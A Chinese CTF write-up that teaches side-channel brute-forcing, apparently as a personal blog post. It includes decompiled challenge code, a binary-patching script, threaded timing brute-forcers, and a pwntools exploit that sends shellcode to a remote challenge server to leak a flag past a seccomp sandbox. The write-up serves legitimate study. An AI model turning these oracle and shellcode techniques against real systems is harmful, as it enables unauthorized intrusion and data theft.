0%

侧信道攻击

侧信道攻击最原始的想法是直接对程序输入数据进行爆破测试 例如羊城杯2024逆向的Rust-VM:

(虽然这并不是侧信道攻击的前置知识 但是不妨碍我把它当成能联想到侧信道的最原始的想法()

[2024 羊城杯]-Rust_vm

前面的第一步加密和主题的关系不大 直接跳过 只需要知道动调出来的结果是将输入的内容进行base64第一步编码 即将输入数据(flag包裹的内容 长度为32bytes)分割为6bits 最后长度是44bytes 重要的是接下来的虚拟机过程:

image-20240829110239568

可以看到处理函数调用了22次 并且每次处理2bytes数据 这时候就应该敏感的察觉到爆破的可能性 而虚拟机内部:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
// positive sp value has been detected, the output may be wrong!
void __fastcall proc(__int64 OPCODES_REGS, int a2, unsigned int a3)
{
__int64 v4; // r9
__int64 v6; // rdx
__int64 v7; // r8
char v8; // cl
char v9; // al
__int64 v10; // rcx
unsigned int v11; // r12d
__int64 v12; // r15
unsigned __int8 v13; // al
char v14; // cl
unsigned __int8 v15; // r13
__int64 v16; // rbx
__int64 v17; // rbp
bool v18; // r14
unsigned __int8 v19; // dl
unsigned __int8 v20; // bp
__int64 v21; // r12
__int64 v22; // r15
__int64 v23; // rax
unsigned int v24; // edi
int v25; // r10d
char v26; // bp
unsigned __int8 v27; // al
__int64 v28; // r15
__int64 v29; // rcx
int v30; // r14d
__int64 v31; // rdx
unsigned int v32; // ecx
__int64 v33; // r10
__int64 v34; // rax
__int64 v35; // rdx
__int64 v36; // r9
__int64 v37; // rax
__int64 v38; // rdx
__int64 v39; // rdx
unsigned __int8 v40; // bp
__int64 v41; // rax
__int64 v42; // rdx
__int64 v43; // rdx
__int64 v44; // rdx
int v45; // [rsp-7Ch] [rbp-124h]
__int64 v46; // [rsp-78h] [rbp-120h]
__int64 v47; // [rsp-70h] [rbp-118h]
__int64 v48; // [rsp-68h] [rbp-110h]
int v49; // [rsp-5Ch] [rbp-104h]
__int64 v50; // [rsp-58h] [rbp-100h]
__int64 v51; // [rsp-50h] [rbp-F8h]
__int64 v52; // [rsp-48h] [rbp-F0h]

v45 = a2;
v4 = (unsigned __int8)a3;
if ( (unsigned __int8)a3 > 3u )
sub_403550((unsigned __int8)a3, 4LL, &off_442EF0);
v6 = a3;
v7 = a3 >> 8;
v8 = a3 + (*((_BYTE *)&v45 + v4) >> 6);
v9 = *((_BYTE *)&v45 + v4) & 0x3F;
*(_BYTE *)(OPCODES_REGS + 1051) = v9;
*(_BYTE *)(OPCODES_REGS + 2LL * (v8 & 3) + 1041) = v9;
v10 = BYTE1(a3);
if ( BYTE1(a3) >= 4u )
sub_403550(BYTE1(a3), 4LL, &off_442F08);
v11 = HIWORD(a3);
v12 = HIBYTE(a3);
v13 = *((_BYTE *)&v45 + v10);
v46 = v7;
*(_BYTE *)(OPCODES_REGS + 2LL * (((_BYTE)v7 + (v13 >> 6)) & 3) + 1041) = v13 & 0x3F;
*(_BYTE *)(OPCODES_REGS + (((unsigned __int8)(65 * v11) >> 5) | 1LL) + 1040) = (65 * v11) & 0x3F;
v14 = (65 * v12) & 0x3F;
*(_BYTE *)(OPCODES_REGS + 1051) = v14;
*(_BYTE *)(OPCODES_REGS + (((unsigned __int8)(65 * v12) >> 5) | 1LL) + 1040) = v14;
v15 = 8 * v11 + 2 * v12;
v16 = v12 & 3;
v17 = (v15 >> 3) & 3;
v18 = (v15 & 0x20) != 0;
v50 = v15 >> 6;
v52 = (unsigned __int8)v11;
v51 = v4;
switch ( v15 >> 6 )
{
case 0:
*(_BYTE *)(OPCODES_REGS + 2 * v16 + 1040) = *(_BYTE *)(OPCODES_REGS + 2 * v16 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v17 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v17 + 1041);
*(_BYTE *)(OPCODES_REGS + 2 * v16 + 1041) = 0;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v17 + 1041) = 0;
break;
case 1:
*(_BYTE *)(OPCODES_REGS + (unsigned __int8)(v17 | (4 * v18)) + 1040) = *(_BYTE *)(OPCODES_REGS + v16 + 1040);
break;
case 2:
if ( (v15 & 0x20) != 0 )
*(_BYTE *)(OPCODES_REGS + v17 + 1048) = *(_BYTE *)(OPCODES_REGS + 2 * v16 + 1040);
else
*(_BYTE *)(OPCODES_REGS + 2 * v16 + 1041) = *(_BYTE *)(OPCODES_REGS + v17 + 1048);
break;
case 3:
*(_BYTE *)(OPCODES_REGS + 1051) = v15 & 0x3E;
break;
}
v48 = v6;
((void (__fastcall *)(__int64, __int64, _QWORD))sub_40AA60)(OPCODES_REGS, v6, v11);
((void (__fastcall *)(__int64, __int64, _QWORD))sub_40AA60)(OPCODES_REGS, v46, (unsigned int)v12);
if ( (unsigned __int8)v11 >= 4u )
sub_403550((unsigned __int8)v11, 4LL, &off_442F20);
v47 = ((unsigned __int8)(8 * v11 + 2 * v12) >> 3) & 3;
v19 = *((_BYTE *)&v45 + (unsigned __int8)v11);
v49 = 2 * v11;
*(_BYTE *)(OPCODES_REGS + ((2 * (_BYTE)v11) & 6) + 1041) = v19 & 0x3F;
v20 = *((_BYTE *)&v45 + v12);
*(_BYTE *)(OPCODES_REGS + 1051) = v20 & 0x3F;
v21 = 2 * v16;
v22 = 2 * v16 + 1;
*(_BYTE *)(OPCODES_REGS + 2 * v16 + 1041) = v20 & 0x3F;
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (v19 >> 6) | 0x20u);
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (v20 >> 6) | 0x24u);
switch ( v50 )
{
case 0LL:
*(_BYTE *)(OPCODES_REGS + v21 + 1040) = *(_BYTE *)(OPCODES_REGS + v22 + 1040);
v23 = (unsigned __int8)v47;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v47 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v47 + 1041);
*(_BYTE *)(OPCODES_REGS + v22 + 1040) = 0;
*(_BYTE *)(OPCODES_REGS + 2 * v23 + 1041) = 0;
goto LABEL_16;
case 1LL:
*(_BYTE *)(OPCODES_REGS + (unsigned __int8)(v47 + 4 * v18) + 1040) = *(_BYTE *)(OPCODES_REGS + v16 + 1040);
LABEL_16:
v24 = v46;
v25 = v48;
break;
case 2LL:
v24 = v46;
v25 = v48;
if ( (v15 & 0x20) != 0 )
*(_BYTE *)(OPCODES_REGS + v47 + 1048) = *(_BYTE *)(OPCODES_REGS + v21 + 1040);
else
*(_BYTE *)(OPCODES_REGS + v22 + 1040) = *(_BYTE *)(OPCODES_REGS + v47 + 1048);
break;
}
v26 = 2 * v24;
v27 = 2 * v24 + 8 * v25;
v28 = v24 & 3;
v29 = (v27 >> 3) & 3;
switch ( v27 >> 6 )
{
case 0:
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v29 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v29 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1041) = 0;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v29 + 1041) = 0;
break;
case 1:
*(_BYTE *)(OPCODES_REGS + (unsigned __int8)(v29 | (4 * ((v27 & 0x20) != 0))) + 1040) = *(_BYTE *)(OPCODES_REGS + v28 + 1040);
break;
case 2:
if ( (v27 & 0x20) != 0 )
*(_BYTE *)(OPCODES_REGS + v29 + 1048) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1040);
else
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1041) = *(_BYTE *)(OPCODES_REGS + v29 + 1048);
break;
case 3:
*(_BYTE *)(OPCODES_REGS + 1051) = v27 & 0x3E;
break;
}
v30 = v25;
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (unsigned int)(v25 - 116));
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (unsigned int)(v30 - 72));
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (unsigned int)(v30 - 84));
LOBYTE(v31) = 0x80;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v31);
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (unsigned int)(v30 - 76));
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (unsigned int)(v30 - 104));
v32 = 2 * v30;
LOBYTE(v32) = 2 * v30 - 88;
v33 = v51 & 3;
v34 = ((unsigned __int8)v32 >> 3) & 3;
v35 = v32;
switch ( (unsigned __int8)v32 >> 6 )
{
case 0:
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v33 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v33 + 1041);
v35 = *(unsigned __int8 *)(OPCODES_REGS + 2LL * (unsigned __int8)v34 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v34 + 1040) = v35;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v33 + 1041) = 0;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v34 + 1041) = 0;
break;
case 1:
*(_BYTE *)(OPCODES_REGS + (unsigned __int8)(v34 | (4 * ((v32 & 0x20) != 0))) + 1040) = *(_BYTE *)(OPCODES_REGS + v33 + 1040);
break;
case 2:
if ( (v32 & 0x20) != 0 )
*(_BYTE *)(OPCODES_REGS + v34 + 1048) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v33 + 1040);
else
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v33 + 1041) = *(_BYTE *)(OPCODES_REGS + v34 + 1048);
break;
case 3:
*(_BYTE *)(OPCODES_REGS + 1051) = v32 & 0x3E;
break;
}
LOBYTE(v35) = -124;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v35);
v36 = v52 & 3;
v37 = ((unsigned __int8)(v49 - 88) >> 3) & 3;
switch ( (unsigned __int8)(v49 - 88) >> 6 )
{
case 0:
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v36 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v36 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v37 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v37 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v36 + 1041) = 0;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v37 + 1041) = 0;
break;
case 1:
*(_BYTE *)(OPCODES_REGS + (unsigned __int8)(v37 | (4 * ((((_BYTE)v49 - 88) & 0x20) != 0))) + 1040) = *(_BYTE *)(OPCODES_REGS + v36 + 1040);
break;
case 2:
if ( (((_BYTE)v49 - 88) & 0x20) != 0 )
*(_BYTE *)(OPCODES_REGS + v37 + 1048) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v36 + 1040);
else
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v36 + 1041) = *(_BYTE *)(OPCODES_REGS + v37 + 1048);
break;
case 3:
*(_BYTE *)(OPCODES_REGS + 1051) = (v49 - 88) & 0x3E;
break;
}
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, 0LL);
LOBYTE(v38) = -100;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v38);
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, v24 - 116);
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, v24 - 72);
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, v24 - 84);
LOBYTE(v39) = 0x80;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v39);
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, v24 - 76);
LOBYTE(v24) = v24 - 104;
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, v24);
v40 = v26 - 88;
v41 = (v40 >> 3) & 3;
v42 = v40 >> 6;
switch ( v40 >> 6 )
{
case 0:
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1041);
v42 = *(unsigned __int8 *)(OPCODES_REGS + 2LL * (unsigned __int8)v41 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v41 + 1040) = v42;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1041) = 0;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v41 + 1041) = 0;
break;
case 1:
*(_BYTE *)(OPCODES_REGS + (unsigned __int8)(v41 | (4 * ((v40 & 0x20) != 0))) + 1040) = *(_BYTE *)(OPCODES_REGS + v28 + 1040);
break;
case 2:
if ( (v40 & 0x20) != 0 )
*(_BYTE *)(OPCODES_REGS + v41 + 1048) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1040);
else
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1041) = *(_BYTE *)(OPCODES_REGS + v41 + 1048);
break;
case 3:
*(_BYTE *)(OPCODES_REGS + 1051) = v40 & 0x3E;
break;
}
LOBYTE(v42) = -124;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v42);
*(_BYTE *)(OPCODES_REGS + 1049) = *(_BYTE *)(OPCODES_REGS + v21 + 1040);
LOBYTE(v43) = 4;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v43);
LOBYTE(v44) = -100;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v44);
}

很明显是难以直接分析或者模拟这个过程进行爆破的 这时候就会自然想到直接对程序输入数据进行爆破的方法 python的subprocess模块就是实现这个想法和下面侧信道攻击的关键 对于这道题 由于缺少侧信道爆破的关键要素–程序含有大量导致程序退出的分支 所以这里要修改一下程序

动调的过程可以很明显看出上述OPCODES_REGS偏移为1040开始是一系列的寄存器 0~1040的数据目测是opcode不过这个不重要 直接看到所有处理函数执行完后的校验环节:

image-20240829111502100

可以看到程序通过检查第8个(8 * 131 = 1048)寄存器的值来判断是否正确 这时候再调试一遍 着重观察第八个寄存器 可以看到每次执行完proc都会增加1~2 最后是一个非零值 这时候就能猜测到这是储存经过对比后和正确数据不相等的数据的个数的 这时候就能开始准备patch程序了 这里选择在每个proc()后的指令patch为跳转到判断目标寄存器的jmp指令(如果要在每个proc后直接增加一个或者修改成cmp的话可能会因为指令长度的问题爆段) 观察到每次proc指令后都会对比r15寄存器的值进行异常处理:

image-20240829112123666

据此筛选出符合条件的21个cmp(最后一个proc不用跳转) patch成目标指令:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from keystone import *
from capstone import *

pe = 'bzff\\vm.exe'
with open(pe, 'rb') as f:
data = bytearray(f.read())
target = 0x40B2E0
base = 0x400c00
end = 0x40CF45
ks = Ks(KS_ARCH_X86, KS_MODE_64)
cs = Cs(CS_ARCH_X86, CS_MODE_64)
to_patch = []
for ins in cs.disasm(data[target - base: end - base], target):
if ins.mnemonic == 'cmp' and ins.op_str.startswith('r15'):
to_patch.append(ins.address)
c = 0
to_patch = to_patch[8:]
for ins in to_patch[::-1]:
new_op = 'jmp 0x40CE56'
new_ins, count = ks.asm(new_op, ins)
if count != 1:
print('Failed to assemble')
break
data[ins - base: ins - base + len(new_ins)] = new_ins
print(f'Patched {hex(ins)}: {new_op}')
with open(f'bzff\\vm_{21 - c}.exe', 'wb') as file:
file.write(data)
c += 1

这样就获得了每次对比2*n(0 < n < 23)个数据的22个pe文件 接下来要做的就是像这些pe文件输入 接下来的想法就是将通过了第n轮检测的数据输入到第n + 1个pe文件中进行下一轮的判断 直到进行完所有的22轮 这里的第一步处理导致实际上每一轮检测的2个数据对应的是32 / 22 ≈ 1.5个数据 这是这题的爆破解法的最后一个难点 需要手动控制已确定字符的长度并手动修改需要进行判断的轮数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import subprocess, threading, time, copy

stdouts = {}

def run(arg, c, i):
proc = subprocess.Popen([f'bzff\\vm.exe_{i}'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
stdout, stderr = proc.communicate(input=arg)
stdouts[c] = stdout[-2:]
# print(f'[+]Testing: {c}')
return stdout

def check_thread_exit(threads):
while True:
if all(not thread.is_alive() for thread in threads):
break
time.sleep(1)
threads.clear()


flag = list('DASCTF{')
flag += list('c669733af3ce4459b88016420b81cb15')
flag += list('_' * (39 - len(flag)) + '}')
print(''.join(flag))
char_table = '0123456789abcdef'
offset = 21
threads = []
pieces = []
for a in char_table:
for b in char_table:
for c in char_table:
input_content = copy.deepcopy(flag)
input_content[7 + 8 + offset : 7 + 8 + offset + 3] = [a, b, c]
input_content = ''.join(input_content)
print(input_content)
t = threading.Thread(target=run, args=(input_content, a+b+c, offset))
threads.append(t)
t.start()
if len(threads) == 256:
check_thread_exit(threads)
for piece in stdouts:
if stdouts[piece] == '!\n':
pieces.append(piece)
stdouts.clear()
print(f'Found: {pieces}')

实际上如果能找到一种直接对虚拟空间中目标内存空间进行赋值的api就可以实现全自动的爆破 也就是下面侧信道攻击的样式 这里挖个坑

以上就是侧信道攻击最原始的想法 下面详细说明时间侧信道攻击的方法和例子

上面应该也能看出来主要是通过subprocess.Popen()直接执行程序 如果程序通过命令行参数接收数据的话就直接将要添加的命令行参数添加到第一个参数的列表中 否则就像上面用communicate()方法进行数据交互 要注意的是只能输入可编码的数据(可见字符) 不能是字节串 时间侧信道攻击的另一个核心就是检查程序的执行时间并将每个输入的数据与进行这个输入后程序的运行时间对应起来 找到运行(存活)时间最长的一个输入当作正确的已确定字符 这里用TFCCTF2024的一道逆向作为例子

[2024 TFCCTF] Functional

程序是用Haskell编译的 比加了混淆还史 几乎不可能静态分析出加密和校验 上网找Haskell逆向的方法 几乎都是爆破 其中有一篇是通过pintool找到程序执行过的指令的条数来进行侧信道攻击 其实本质上和对时间的侧信道攻击大差不大 因为执行的指令条数在一定程度上可以用执行的时间来衡量 而执行的指令越多 执行的时间越长就说明越有可能是正确的字符(如果错误会直接退出) 这道题就是专门为这种方法设计的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import subprocess, threading, time

times = {}

def run(arg, c):
print('[+]Testing:' + arg)
t1 = time.time()
proc = subprocess.Popen(['./main', arg], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()
cost = time.time() - t1
times[c] = cost
return stdout

def check_thread_exit(threads):
while True:
if all(not thread.is_alive() for thread in threads):
break
time.sleep(1)


elf = './main'
# times = {}
# for i in range(0x40):
# input_content = i * '_'
# t1 = time.time()
# proc = subprocess.Popen([elf, input_content], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# stdout, stderr = proc.communicate()
# cost = time.time() - t1
# times[str(i)] = cost
# print(times)
right_len = 28
flag = list('TFCCTF{' + 'A' * (right_len - 7))
char_table = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_{}+-!@#$%^&*()'
for i in range(7, right_len):
threads = []
for c in char_table:
input_content = flag
input_content[i] = c
input_content = ''.join(input_content)
t = threading.Thread(target=run, args=(input_content, c))
threads.append(t)
t.start()
check_thread_exit(threads)
most_likely = sorted(times.items(), key=lambda x: x[1], reverse=True)[0][0]
flag[i] = most_likely
times.clear()
print('\n[+]Solution found:')
print(''.join(flag))

除了在普通的加密-校验程序中可以用到 侧信道还能在简单的游戏逆向中发挥作用 比如下面这个例子

[2024 DASCTF八月开学季] maze

直接看主函数可以看到是一个8 * 8 * 8的三维迷宫 没有设置地图边界 移动时只有碰到墙壁才会停下 越界则会直接判定失败并结束程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
int __fastcall main(int argc, const char **argv, const char **envp)
{
__int64 v3; // rdx
__int64 v4; // r8
__int64 v5; // rdx
__int64 v6; // r8
int pos; // [rsp+20h] [rbp-98h]
char Str[112]; // [rsp+30h] [rbp-88h] BYREF

pos = 0;
memset(Str, 0, 100);
print("Welcome to this sign in problem.\n", argv, envp);
print("Give me your input:", v3, v4);
print_0("%s", Str);
for ( step = 0; ; ++step )
{
if ( step >= strlen(Str) )
quit();
Sleep(0x28u);
switch ( Str[step] )
{
case 'a':
while ( 1 )
{
v5 = (pos >> 31) & 7;
if ( pos % 8 - 1 < 0 )
quit();
if ( (*maze)[pos - 1] )
break;
--pos;
}
break;
case 'd':
while ( 1 )
{
v5 = (pos >> 31) & 7;
if ( pos % 8 + 1 >= 8 )
quit();
if ( (*maze)[pos + 1] )
break;
++pos;
}
break;
case 'n':
while ( 1 )
{
if ( pos - 64 < 0 )
quit();
if ( (*maze)[pos - 64] )
break;
pos -= 64;
}
break;
case 's':
while ( 1 )
{
v5 = (pos >> 31) & 0x3F;
if ( pos % 64 + 8 >= 64 )
quit();
if ( (*maze)[pos + 8] )
break;
pos += 8;
}
break;
case 'u':
while ( 1 )
{
if ( pos + 64 >= 512 )
quit();
if ( (*maze)[pos + 64] )
break;
pos += 64;
}
break;
case 'w':
while ( 1 )
{
v5 = (pos >> 31) & 0x3F;
if ( pos % 64 - 8 < 0 )
quit();
if ( (*maze)[pos - 8] )
break;
pos -= 8;
}
break;
default:
quit();
}
if ( pos == 436 )
break;
}
print("Good job, the flag is md5_32_lower(your input)", v5, v6);
return 0;
}

如果不想盯着迷宫硬解的话 也可以用时间侧信道进行爆破 只需要添加几个条件 例如不能重复一个步骤 不能在一步后进行相反的一步:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import subprocess, threading, time, copy

times = {}
stdouts = {}

def run(arg, c):
t1 = time.time()
proc = subprocess.Popen(['bzff\\Maze.exe'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
stdout, stderr = proc.communicate(input=arg)
cost = time.time() - t1
times[c] = cost
stdouts[c] = stdout[-4:]
return stdout

def check_thread_exit(threads):
while True:
if all(not thread.is_alive() for thread in threads):
break
time.sleep(1)


# times = {}
# for i in range(0x40):
# input_content = i * '_'
# t1 = time.time()
# proc = subprocess.Popen([elf, input_content], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# stdout, stderr = proc.communicate()
# cost = time.time() - t1
# times[str(i)] = cost
# print(times)
flag = ['s', 'd']
oppsite = {'w': 's', 's': 'w', 'a': 'd', 'd': 'a', 'u': 'n', 'n': 'u'}
while(True):
threads = []
print(f'[+]Now: {"".join(flag)}')
char_table = 'wasdun'.replace(flag[-1], '').replace(oppsite[flag[-1]], '')
for a in char_table:
char_table2 = char_table.replace(a, '').replace(oppsite[a], '')
for c in char_table2:
input_content = copy.deepcopy(flag)
input_content += [a, c]
input_content = ''.join(input_content)
t = threading.Thread(target=run, args=(input_content, a+c))
threads.append(t)
t.start()
check_thread_exit(threads)
if 'put)' not in [stdouts[c] for c in stdouts]:
most_likely = sorted(times.items(), key=lambda x: x[1], reverse=True)[0][0]
flag += list(most_likely)[0]
stdouts.clear()
times.clear()
else:
print('\n[+]Solution found:')
print(''.join(flag), end='\nRest in :')
print(stdouts)
break

[2024 DASCTF金秋十月] sixbytes

这题的逻辑很简单:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
char *readflag()
{
int fd; // [rsp+4h] [rbp-Ch]

fd = open("flag", 0);
read(fd, aDasctfTestflag, 0x100uLL);
close(fd);
return aDasctfTestflag;
}
void *readshellcode()
{
void *buf; // [rsp+0h] [rbp-10h]

buf = mmap((void *)0x20240000, 0x1000uLL, 7, 34, 0xFFFFFFFF, 0LL);
read(0, buf, 6uLL);
return buf;
}
unsigned __int64 setrule()
{
__int64 v1; // [rsp+0h] [rbp-10h]
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
v1 = seccomp_init(0LL);
if ( !v1 )
{
perror("seccomp_init");
exit(1);
}
if ( (int)seccomp_load(v1) < 0 )
{
perror("seccomp_load");
seccomp_release(v1);
exit(1);
}
seccomp_release(v1);
return v2 - __readfsqword(0x28u);
}
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
void (__fastcall *v3)(char *, _QWORD); // [rsp-10h] [rbp-20h]
char *v4; // [rsp-8h] [rbp-18h]

sub_564B45B0534A();
alarm(0xAu);
v4 = readflag();
v3 = (void (__fastcall *)(char *, _QWORD))readshellcode(10LL);
alarm(5u);
setrule();
v3(v4, 0LL);
exit(0);
}

使用了seccomp的默认规则 即禁用所有系统调用 这意味着基本上不可能输出读取到的flag

经过调试可以发现调用用户输入的shellcode时RDI中存放读到的flag地址 那么就可以利用这样的思路来爆破得到flag: 构造 cmp byte ptr [rdi + index], chr 来对比真正flag对应位上和猜测的字符

除此之外还要选择用来爆破的信道 这里选用程序是否已经超出输出流尾部(EOFerror) 因为当程序执行到6 bytes后面的\x00时会因为Bad Instruction而退出 此时再接收数据就会触发EOFerror 综上可以构造以下shellcode:

1
2
3
loop:
cmp byte ptr [rdi + index], chr;
jne loop;

让pwntools在timeout的时间范围内接收数据 如果猜测值是正确的程序会继续执行\x00并在接收数据时抛出EOFerror 否则会正常接收到b''不报错 利用这点构造以下EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
from keystone import *

context.log_level = 'error'
ks = Ks(KS_ARCH_X86, KS_MODE_64)

def Test_charAt_Index(ip, port, index, c):
io = remote(ip, port)
code = f"loop:;cmp byte ptr [rdi + {hex(index)}], {hex(c)};jne loop;"
asmcode, _ = ks.asm(code)
try:
io.sendline(bytes(asmcode))
data = io.recv(timeout=1)
except EOFError:
return True
return False

flag = "DASCTF{"
table = [ord(x) for x in "0123456789abcdef-{}"]
threads = []
while flag[-1] != "}":
for i in range(ord(' '), ord('}') + 1):
if Test_charAt_Index("node5.buuoj.cn", xxxxx, len(flag), i):
flag += chr(i)
print(flag)
break

与逆向中本地爆破的侧信道不同 靶机同时只能运行一个目标程序 所以不进行多线程爆破 这样就需要根据输出的flag特征适当进行table范围的缩小或更改timeout